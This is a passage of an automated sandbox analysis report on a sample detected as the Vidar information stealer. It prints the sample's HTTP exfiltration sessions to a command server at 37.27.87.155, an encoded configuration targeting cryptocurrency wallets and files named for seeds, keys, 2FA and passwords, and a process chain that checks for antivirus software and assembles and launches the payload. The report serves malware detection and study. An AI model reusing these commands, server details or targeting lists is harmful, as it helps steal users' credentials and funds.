                                                                                                                                                                                                                                    2024-04-30 05:44:27 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------DGDAEHCBGIIJJJJKKKEHCont
                                                                                                                                                                                                                                    2024-04-30 05:44:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:27 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2024-04-30 05:44:27 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                    Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    17192.168.2.84972637.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:28 UTC261OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKE
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:28 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------DBKKFHIEGDHJKECAAKKECont
                                                                                                                                                                                                                                    2024-04-30 05:44:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:29 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2024-04-30 05:44:29 UTC2208INData Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                    Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    18192.168.2.84972737.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:32 UTC263OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJE
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Content-Length: 61029
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:32 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------CGCFBFBGHDGDAKECAKJECont
                                                                                                                                                                                                                                    2024-04-30 05:44:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2024-04-30 05:44:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2024-04-30 05:44:32 UTC11964OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                    2024-04-30 05:44:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:33 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2024-04-30 05:44:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    19192.168.2.84972837.27.87.155443752C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2024-04-30 05:44:33 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----GHIDHCBGDHJKEBGDGIJE
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                    Host: 37.27.87.155
                                                                                                                                                                                                                                    Content-Length: 7005
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2024-04-30 05:44:33 UTC7005OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 47 44 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 47 44 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 47 44 47 49 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                    Data Ascii: ------GHIDHCBGDHJKEBGDGIJEContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------GHIDHCBGDHJKEBGDGIJEContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------GHIDHCBGDHJKEBGDGIJECont
                                                                                                                                                                                                                                    2024-04-30 05:44:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Tue, 30 Apr 2024 05:44:34 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    2024-04-30 05:44:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                    Start time:07:42:25
                                                                                                                                                                                                                                    Start date:30/04/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\0dN59ZIkEM.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\0dN59ZIkEM.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:819'026 bytes
                                                                                                                                                                                                                                    MD5 hash:1A6E4128750535604181321CE27C3084
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                    Start time:07:42:26
                                                                                                                                                                                                                                    Start date:30/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmd
                                                                                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                    Start time:07:42:28
                                                                                                                                                                                                                                    Start date:30/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                    Start time:07:42:30
                                                                                                                                                                                                                                    Start date:30/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                    Start time:07:42:30
                                                                                                                                                                                                                                    Start date:30/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                                                                                                                                                                                    Imagebase:0x870000
                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                    Start time:07:42:31
                                                                                                                                                                                                                                    Start date:30/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                    Start time:07:42:31
                                                                                                                                                                                                                                    Start date:30/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                                                                                                                                    Imagebase:0x870000
                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                    Start time:07:42:31
                                                                                                                                                                                                                                    Start date:30/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:cmd /c md 1151
                                                                                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                    Start time:07:42:31
                                                                                                                                                                                                                                    Start date:30/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:findstr /V "NickelTruckWritersBattery" Mattress
                                                                                                                                                                                                                                    Imagebase:0x870000
                                                                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                                                                    Start time:07:42:31
                                                                                                                                                                                                                                    Start date:30/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:cmd /c copy /b Mostly + Rap + Robust + Aboriginal 1151\a
                                                                                                                                                                                                                                    Imagebase:0xa40000
                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                    Start time:07:42:31
                                                                                                                                                                                                                                    Start date:30/04/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:1151\Spice.pif 1151\a
                                                                                                                                                                                                                                    Imagebase:0xe70000
                                                                                                                                                                                                                                    File size:893'608 bytes
                                                                                                                                                                                                                                    MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
